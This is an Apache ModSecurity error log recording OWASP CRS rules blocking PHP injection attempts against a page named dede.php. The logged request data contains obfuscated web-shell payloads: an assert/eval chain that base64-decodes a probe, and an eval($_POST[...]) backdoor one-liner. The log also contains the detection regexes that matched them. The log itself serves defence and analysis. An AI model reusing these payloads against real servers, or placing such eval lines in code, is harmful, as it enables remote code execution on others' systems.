[Wed Nov 17 03:03:34.621981 2021] [:error] [pid 16661:tid 140232963913472] [client 117.94.177.54:59304] [client 117.94.177.54] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/dh/apache2/template/etc/mod_sec3_CRS/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "348"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: array_map(\\x22ass\\x22.\\x22ert\\x22,array(\\x22ev\\x22.\\x22Al(\\x5c\\x22\\x5c\\x5c\\x5c$xx=\\x5c\\x5c\\x5c\\x22Ba\\x22.\\x22SE6\\x22.\\x224_dEc\\x22.\\x22OdE\\x5c\\x5c\\x5c\\x22;@ev\\x22.\\x22al(\\x5c\\x5c\\x5c$xx('NzAwODg0O0Bpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7QHNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtlY2hvKCJAKmx4bCpAIik7O2VjaG8oIkxYTCIpO2VjaG8oIipAbHhsQCoiKTtkaWUoKTs='));\\x5c\\x22);\\x22)) found within ARGS:0: array_map(\\x22ass\\x22.\\x22ert\\x22,array(\\x22ev\\x22.\\x22Al(\\x5c\\x22\\x5c\\x5c\\x5c$xx=..."] [severity "CRITICAL"] [ver "OW [hostname "www.secrepo.com"] [uri "/data/dede.php"] [unique_id "YZThhu8XC3lWw6hwXD93qAAAARE"], referer: http://misc.yahoo.com.cn/ [Wed Nov 17 03:03:34.622267 2021] [:error] [pid 16661:tid 140232963913472] [client 117.94.177.54:59304] [client 117.94.177.54] ModSecurity: Warning. Pattern match "\\\\$+(?:[a-zA-Z_\\\\x7f-\\\\xff][a-zA-Z0-9_\\\\x7f-\\\\xff]*|\\\\s*{.+})(?:\\\\s|\\\\[.+\\\\]|{.+}|/\\\\*.*\\\\*/|//.*|#.*)*\\\\(.*\\\\)" at ARGS:0. [file "/dh/apache2/template/etc/mod_sec3_CRS/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "460"] [id "933180"] [msg "PHP Injection Attack: Variable Function Call Found"] [data "Matched Data: $xx('NzAwODg0O0Bpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7QHNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtlY2hvKCJAKmx4bCpAIik7O2VjaG8oIkxYTCIpO2VjaG8oIipAbHhsQCoiKTtkaWUoKTs='));\\x5c\\x22);\\x22)) found within ARGS:0: array_map(\\x22ass\\x22.\\x22ert\\x22,array(\\x22ev\\x22.\\x22Al(\\x5c\\x22\\x5c\\x5c\\x5c$xx=\\x5c\\x5c\\x5c\\x22Ba\\x22.\\x22SE6\\x22.\\x224_dEc\\x22.\\x22OdE\\x5c\\x5c\\x5c\\x22;@ev\\x22.\\x22al(\\x5c\\x5c\\x5c$xx('NzAwODg0O0Bpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7Q..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWAS [hostname "www.secrepo.com"] [uri "/data/dede.php"] [unique_id "YZThhu8XC3lWw6hwXD93qAAAARE"], referer: http://misc.yahoo.com.cn/ [Wed Nov 17 03:03:34.623612 2021] [:error] [pid 16661:tid 140232963913472] [client 117.94.177.54:59304] [client 117.94.177.54] ModSecurity: Access denied with code 418 (phase 2). Operator GE matched 7 at TX:anomaly_score. [file "/dh/apache2/template/etc/mod_sec3_CRS/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "93"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.secrepo.com"] [uri "/data/dede.php"] [unique_id "YZThhu8XC3lWw6hwXD93qAAAARE"], referer: http://misc.yahoo.com.cn/ [Wed Nov 17 03:03:35.077640 2021] [:error] [pid 16661:tid 140232821303040] [client 117.94.177.54:59304] [client 117.94.177.54] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:m[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*q[\\"\\\\^]*l(?:[\\"\\\\^]*(?:d[\\"\\\\^]*u[\\"\\\\^]*m[\\"\\\\^]*p(?:[\\"\\\\^]*s[\\"\\\\^ ..." at ARGS:z0. [file "/dh/apache2/template/etc/mod_sec3_CRS/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "255"] [id "932110"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: ;echo found within ARGS:z0: 332719;@ini_set(\\x22display_errors\\x22,\\x220\\x22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo(\\x22@*lxl*@\\x22);;echo(\\x22LXL\\x22);echo(\\x22*@lxl@*\\x22);die();"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-shell"] [tag "platform-windows"] [tag "attack-rce"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/248/88"] [tag "PCI/6.5.2"] [hostname "www.secrepo.com"] [uri "/data/dede.php"] [unique_id "YZThh@8XC3lWw6hwXD93qQAAARI"], referer: http://misc.yahoo.com.cn/ [Wed Nov 17 03:03:35.078148 2021] [:error] [pid 16661:tid 140232821303040] [client 117.94.177.54:59304] [client 117.94.177.54] ModSecurity: Warning. Matched phrase "$_POST" at ARGS:0. [file "/dh/apache2/template/etc/mod_sec3_CRS/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "160"] [id "933130"] [msg "PHP Injection Attack: Variables Found"] [data "Matched Data: $_POST found within ARGS:0: @eval(get_magic_quotes_gpc()?stripslashes($_post[chr(122).chr(48)]):$_post[chr(122).chr(48)]);"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/242"] [hostname "www.secrepo.com"] [uri "/data/dede.php"] [unique_id "YZThh@8XC3lWw6hwXD93qQAAARI"], referer: http://misc.yahoo.com.cn/ [Wed Nov 17 03:03:35.078337 2021] [:error] [pid 16661:tid 140232821303040] [client 117.94.177.54:59304] [client 117.94.177.54] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/dh/apache2/template/etc/mod_sec3_CRS/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "348"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(get_magic_quotes_gpc()?stripslashes($_POST[chr(122).chr(48)]):$_POST[chr(122).chr(48)]) found within ARGS:0: @eval(get_magic_quotes_gpc()?stripslashes($_POST[chr(122).chr(48)]):$_POST[chr(122).chr(48)]);"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/242"] [hostname "www.secrepo.com"] [uri "/data/dede.php"] [unique_id "YZThh@8XC3lWw6hwXD93qQAAARI"], referer: http://misc.yahoo.com.cn/ [Wed Nov 17 03:03:35.078481 2021] [:error] [pid 16661:tid 140232821303040] [client 117.94.177.54:59304] [client 117.94.177.54] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:z0. [file "/dh/apache2/template/etc/mod_sec3_CRS/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "348"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: ini_set(\\x22display_errors\\x22,\\x220\\x22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo(\\x22@*lxl*@\\x22);;echo(\\x22LXL\\x22);echo(\\x22*@lxl@*\\x22);die() found within ARGS:z0: 332719;@ini_set(\\x22display_errors\\x22,\\x220\\x22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo(\\x22@*lxl*@\\x22);;echo(\\x22LXL\\x22);echo(\\x22*@lxl@*\\x22);die();"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWA [hostname "www.secrepo.com"] [uri "/data/dede.php"] [unique_id "YZThh@8XC3lWw6hwXD93qQAAARI"], referer: http://misc.yahoo.com.cn/ [Wed Nov 17 03:03:35.078784 2021] [:error] [pid 16661:tid 140232821303040] [client 117.94.177.54:59304] [client 117.94.177.54] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/dh/apache2/template/etc/mod_sec3_CRS/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "69"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:0: @eval(get_magic_quotes_gpc()?stripslashes($_POST[chr(122).chr(48)]):$_POST[chr(122).chr(48)]);"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/152/242"] [hostname "www.secrepo.com"] [uri "/data/dede.php"] [unique_id "YZThh@8XC3lWw6hwXD93qQAAARI"], referer: http://misc.yahoo.com.cn/ [Wed Nov 17 03:03:35.080136 2021] [:error] [pid 16661:tid 140232821303040] [client 117.94.177.54:59304] [client 117.94.177.54] ModSecurity: Access denied with code 418 (phase 2). Operator GE matched 7 at TX:anomaly_score. [file "/dh/apache2/template/etc/mod_sec3_CRS/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "93"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.2"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.secrepo.com"] [uri "/data/dede.php"] [unique_id "YZThh@8XC3lWw6hwXD93qQAAARI"], referer: http://misc.yahoo.com.cn/